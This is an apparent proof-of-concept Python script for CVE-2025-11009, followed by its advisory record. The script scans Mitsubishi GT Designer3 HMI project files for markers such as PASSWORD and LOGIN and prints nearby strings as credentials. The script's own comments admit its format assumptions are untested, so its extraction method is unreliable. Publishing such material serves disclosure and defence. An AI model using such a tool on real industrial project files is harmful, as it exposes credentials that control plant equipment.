CVE-2025-11009

# CVE-2025-11009 PoC - GT Designer3 Project File Credential Extraction # This PoC demonstrates extracting plaintext credentials from GT Designer3 project files import struct import os def parse_gt_project_file(filepath): """ Parse GT Designer3 project file and extract plaintext credentials """ credentials = [] if not os.path.exists(filepath): print(f"[-] File not found: {filepath}") return credentials with open(filepath, 'rb') as f: data = f.read() # GT Designer3 project file signature if b'GOT2000' in data or b'GOT1000' in data: print(f"[+] Valid GT Designer3 project file detected") # Search for common credential-related patterns # These patterns may vary based on actual file format credential_markers = [ b'PASSWORD', b'PASSWD', b'AUTH', b'USER', b'LOGIN' ] for marker in credential_markers: offset = 0 while True: pos = data.find(marker, offset) if pos == -1: break # Extract potential credential string after marker # Adjust extraction range based on file format analysis start = pos + len(marker) end = min(start + 128, len(data)) chunk = data[start:end] # Look for printable ASCII strings (potential credentials) printable = '' for byte in chunk: if 32 <= byte <= 126: printable += chr(byte) else: if len(printable) >= 4: # Min password length credentials.append(printable) printable = '' if len(credentials) > 10: break offset = pos + 1 return credentials def main(): project_file = input("Enter path to GT Designer3 project file (.gt3/.gpf): ") creds = parse_gt_project_file(project_file) if creds: print(f"\n[+] Found {len(creds)} potential credentials:") for i, cred in enumerate(set(creds), 1): print(f" {i}. {cred}") else: print("[-] No credentials found or file format not recognized") if __name__ == "__main__": main() # Note: This is a simplified PoC. Actual file format analysis requires: # 1. Reverse engineering the GT Designer3 project file format # 2. Identifying exact storage locations for different credential types # 3. Testing with actual project files to validate extraction method

{"cve": {"id": "CVE-2025-11009", "sourceIdentifier": "[email protected]", "published": "2025-12-17T02:16:00.577", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cleartext Storage of Sensitive Information vulnerability in Mitsubishi Electric GT Designer3 Version1 (GOT2000) all versions and Mitsubishi Electric GT Designer3 Version1 (GOT1000) all versions allows a local unauthenticated attacker to obtain plaintext credentials from the project file for GT Designer3. This could allow the attacker to operate illegally GOT2000 series or GOT1000 series by using the obtained credentials."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.4, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-312"}]}], "references": [{"url": "https://jvn.jp/vu/JVNVU99629801/", "source": "[email protected]"}, {"url": "https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-017_en.pdf", "source": "[email protected]"}]}}